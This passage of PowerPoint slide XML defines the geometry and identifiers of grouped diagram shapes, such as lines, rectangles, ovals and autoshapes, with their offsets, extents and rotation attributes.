                      <p:nvPicPr>
                        <p:cNvPr id="848973" name="Object 77">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{306F926E-E5F3-5C44-87FA-24677974F93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74" name="Rectangle 78">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA5CAF3A-62E0-8943-A67F-DBB3766D4C31}"/>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75" name="Line 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB25C0C2-C298-684A-AEBB-310E0A8EB10F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10273333" y="4986623"/>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76" name="Group 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6206984C-E2B8-2442-B7A3-01960B35B908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10994058" y="4410361"/>
            <a:ext cx="207962" cy="409575"/>
            <a:chOff x="4180" y="783"/>
            <a:chExt cx="150" cy="307"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="848977" name="AutoShape 81">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5B5D6D5-1AF4-2642-9064-DECCEACEF989}"/>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78" name="Rectangle 82">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB786ABE-662D-594B-8C2E-B81FD51CC8AB}"/>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79" name="Rectangle 83">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9A7D5E7-6981-E44C-BCEA-1D86E89EDD0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0" name="AutoShape 84">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A96228C4-1B1E-2C49-B509-B799AA1EE03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1" name="Line 85">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7AED5A2-CA18-7743-96A7-BFB4FFD739D0}"/>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2" name="Line 86">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E5B81386-CCCD-6C42-B935-5122DACF7FE4}"/>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3" name="Rectangle 87">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63783986-2F0F-D040-B38F-AF6FDC4ED42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4" name="Rectangle 88">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08EC7B17-C6B1-1746-98F2-8E09F971AAD5}"/>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85" name="Group 89">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3451B170-C411-304F-90E4-2978C5CFB472}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10981358" y="4854861"/>
            <a:ext cx="207962" cy="409575"/>
            <a:chOff x="4180" y="783"/>
            <a:chExt cx="150" cy="307"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="848986" name="AutoShape 90">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A831072-EA52-BA48-BDA0-23C6B575956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7" name="Rectangle 91">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4B64FDDC-6E8F-134C-AF51-767C01E32119}"/>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8" name="Rectangle 92">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E06D701-5463-9D46-8F06-607DA3307387}"/>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9" name="AutoShape 93">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{413EA3F8-CEFE-4F4C-A28E-49CF7CF608B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0" name="Line 94">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{314A6081-3421-B447-B63E-0BA0FE1C4A52}"/>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1" name="Line 95">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EC1149F-BAC7-D541-ACB7-F043985A9CD7}"/>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2" name="Rectangle 96">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D13ACF04-43AE-4343-9A0E-23DF1473AE7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3" name="Rectangle 97">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C9A6EFB-3FEF-8F43-BB65-370D7204C1B0}"/>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94" name="Line 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4B8DC8B-EFA6-EC47-AD6B-3A89DAD06328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="5400000" flipH="1">
            <a:off x="10607502" y="4784217"/>
            <a:ext cx="6111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5" name="Line 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F8264E11-CA52-9343-8FBC-8A8B27381F2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="10961514" y="5036629"/>
            <a:ext cx="0" cy="103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6" name="Line 100">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF120522-B73B-804D-AD59-4ED7D2ABD614}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm rot="16200000">
            <a:off x="10951195" y="4567523"/>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7" name="Line 101">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D459FCD-E4FE-1947-BDF3-DF55218506A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="9630395" y="2708561"/>
            <a:ext cx="458788" cy="2079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8" name="Line 102">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76F650BF-CA23-E245-9943-9AA14AA32354}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10565434" y="2692686"/>
            <a:ext cx="485775" cy="2079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9" name="Line 103">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6DB3D40-A2C0-2547-A289-030EC7B54968}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="11084545" y="3029235"/>
            <a:ext cx="24130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0" name="Line 104">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7A5901C-1B30-0349-8E21-4D551D4CE84C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10314608" y="2805398"/>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1" name="Line 105">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE3C8A5F-92D8-F94E-9DFE-67BCF2B046A7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="10340009" y="3453098"/>
            <a:ext cx="534987"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2" name="Line 106">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{118F0893-F773-1944-9D21-599DC76EBF0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="10800383" y="3918236"/>
            <a:ext cx="266700" cy="360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3" name="Line 107">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B8DD717B-E6D9-9A4E-BB1D-CE3EA87C9774}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="10573370" y="2997486"/>
            <a:ext cx="560388" cy="384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4" name="Line 108">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F9F5781-CDD2-0348-A92D-9043F4D47DEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="10582895" y="2437099"/>
            <a:ext cx="350838" cy="255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5" name="Line 109">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F34EF27-E4A3-4A4C-9CFE-947C67F1E9B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="11300446" y="2613311"/>
            <a:ext cx="201613" cy="176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06" name="Group 110">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BA768CE-555A-1848-B6B2-C4C8D22D0C58}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9111283" y="2805398"/>
            <a:ext cx="501650" cy="233362"/>
            <a:chOff x="3600" y="219"/>
            <a:chExt cx="360" cy="175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849007" name="Oval 111">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{521FFDA4-7BA1-9C44-A949-952B3D4680A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8" name="Line 112">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C9C9AC2-3384-1940-87F9-2C8768E64FAC}"/>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9" name="Line 113">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B2139237-1F63-4848-87DC-10124A99FD6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0" name="Rectangle 114">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05EDDE47-9E63-C741-A973-051C7B3A56F0}"/>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11" name="Oval 115">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCFE5DB3-A6D1-6B47-9239-C6CF5ACFEAE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12" name="Group 116">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F21A30B-1C25-7345-8E67-C2D23F3A3045}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3686" y="244"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849013" name="Line 117">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC3677D9-54AC-2845-A7BA-AADF3258D73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4" name="Line 118">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4056D482-277B-5742-9237-7678561F6A5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5" name="Line 119">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42ACB99E-349B-0A43-9F35-B6CAE5188EAD}"/>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16" name="Group 120">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A5BFA5D-212D-5F45-A2CC-CB1669B96AA3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3686" y="243"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849017" name="Line 121">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22C18FB7-8750-034C-96BD-A5203F5DE0D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8" name="Line 122">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{066E892C-811A-2648-8C09-B3A8289AEA0C}"/>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9" name="Line 123">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF7524FC-F62B-3F4C-ADAC-7AD76D1FD02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20" name="Group 124">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C18BC41E-0D66-5040-9FFB-41B2651041DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10063783" y="2576798"/>
            <a:ext cx="501650" cy="233362"/>
            <a:chOff x="3600" y="219"/>
            <a:chExt cx="360" cy="175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849021" name="Oval 125">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1643C78-3BCF-9843-AAD9-DC7AA7282AD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2" name="Line 126">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8898EEB5-5884-9743-9BB0-0D558E6F2234}"/>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3" name="Line 127">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED134665-CBC4-ED4E-AD8C-E2583C19B403}"/>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4" name="Rectangle 128">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C4D3522-AA0F-D74B-B3CF-9FE1ECE3907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25" name="Oval 129">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE6D6E90-71DC-8D48-90DE-68034F13CE3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26" name="Group 130">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A35F1EC-3BB0-294F-BD0B-F2DA46F98C7E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3686" y="244"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849027" name="Line 131">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB3FE6DC-6BC9-9744-8C18-E3746E62A04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8" name="Line 132">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40E5316B-87E7-4948-BC58-C7B3F070880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9" name="Line 133">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E162DAF-38F3-6040-87D6-E26FFC9BD63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30" name="Group 134">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CCBFCF15-23DF-F249-AA8B-8C5446F01D93}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3686" y="243"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849031" name="Line 135">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E395CCC-8AC1-3945-A502-0EC53BCEF8F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2" name="Line 136">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58E60305-4AC6-E348-BA62-294EE24DB18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3" name="Line 137">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95DEFA1C-ECA3-8A45-80C5-53F71E337597}"/>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34" name="Group 138">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8ACEC3E-6A22-3A4C-97AF-0329642EC96E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10081245" y="3234023"/>
            <a:ext cx="501650" cy="233362"/>
            <a:chOff x="3600" y="219"/>
            <a:chExt cx="360" cy="175"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849035" name="Oval 139">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59F027D8-6A75-A747-B3FA-43275E55B49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6" name="Line 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45F240E1-970A-AA41-A418-5ACF0C96884B}"/>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7" name="Line 141">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB2B8D8F-B3C1-C945-A719-41981139D780}"/>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8" name="Rectangle 142">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D77E5526-12F8-734D-ACBF-156915EF8B46}"/>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39" name="Oval 143">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{978EFC09-A5D7-8949-8308-29E9021E503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40" name="Group 144">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A59B3047-69E9-FB43-826F-C9AE0E1AAE34}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3686" y="244"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849041" name="Line 145">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{27A33B36-323B-3D48-8FB3-55BBE2B27F1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2" name="Line 146">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1A33D3F-B717-FC46-AC01-006D1F5B0DE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3" name="Line 147">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C27D7459-D646-014D-9C9C-E36BC1BBBFA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44" name="Group 148">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E88204A-DC26-F34A-8B37-D43453CB645D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm flipV="1">
              <a:off x="3686" y="243"/>
              <a:ext cx="177" cy="66"/>
              <a:chOff x="2848" y="848"/>
              <a:chExt cx="140" cy="98"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="849045" name="Line 149">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08DFD38C-44CA-5E4C-A9F5-94337BFEC77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6" name="Line 150">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
